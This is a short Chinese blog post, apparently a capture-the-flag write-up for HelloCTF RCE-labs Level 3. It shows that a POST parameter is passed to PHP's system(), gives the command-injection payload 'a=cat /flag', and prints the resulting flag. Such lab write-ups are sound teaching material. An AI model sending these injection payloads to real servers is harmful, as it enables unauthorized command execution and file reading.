技术栈

HelloCTF [RCE-labs] Level 3 - 命令执行

南暮思鸢2024-10-29 10:19

开启靶场,打开链接:

这关代码跟level 1的区别是eval(_POST\['a'\]);变成了system(_POST['a']);

system() 函数会通过软连接执行你输入的系统命令

POST传参:a=cat /flag

成功得到flag:

NSSCTF{b10b3661-b382-467e-86be-4c374fdd3e5f}

上一篇:再次被约谈了
下一篇:安卓早期apk兼容性适配之内存读写
相关推荐
小屋主人
1 小时前
【实用软件】UninstallTool:一个小巧、安全、快速、强大的卸载软件
经验分享·其他·软件·软件卸载
星轨初途
2 小时前
数据结构排序算法详解(5)——非比较函数:计数排序(鸽巢原理)及排序算法复杂度和稳定性分析
c语言·开发语言·数据结构·经验分享·笔记·算法·排序算法
oh-pinpin
2 小时前
安全配置类
安全·web安全
ヽ格式化
3 小时前
一文读懂栈与堆:从生活例子到Golang/PHP内存管理实践
golang·php·生活
骥龙
4 小时前
4.12、隐私保护机器学习:联邦学习在安全数据协作中的应用
人工智能·安全·网络安全
c***9798
4 小时前
PHP在内容管理中的模板引擎
开发语言·php
Q_Q511008285
5 小时前
python+django/flask的情绪宣泄系统
spring boot·python·pycharm·django·flask·node.js·php
用户722786812344
5 小时前
PHP Fiber 优雅协作式多任务
php
热门推荐
01GitHub 镜像站点02【保姆级教程】免费使用Gemini3的5种方法!免翻墙/国内直连03BongoCat - 跨平台键盘猫动画工具04UV安装并设置国内源05安娜的档案(Anna’s Archive) 镜像网站/国内最新可访问入口(持续更新)06Linux下V2Ray安装配置指南07Labelme从安装到标注:零基础完整指南08Google Antigravity:无法登录?早期错误、登录修复和用户反馈指南09全球最强模型Grok4,国内已可免费使用!(附教程)10Gemini 3.0 Pro Preview 实测报告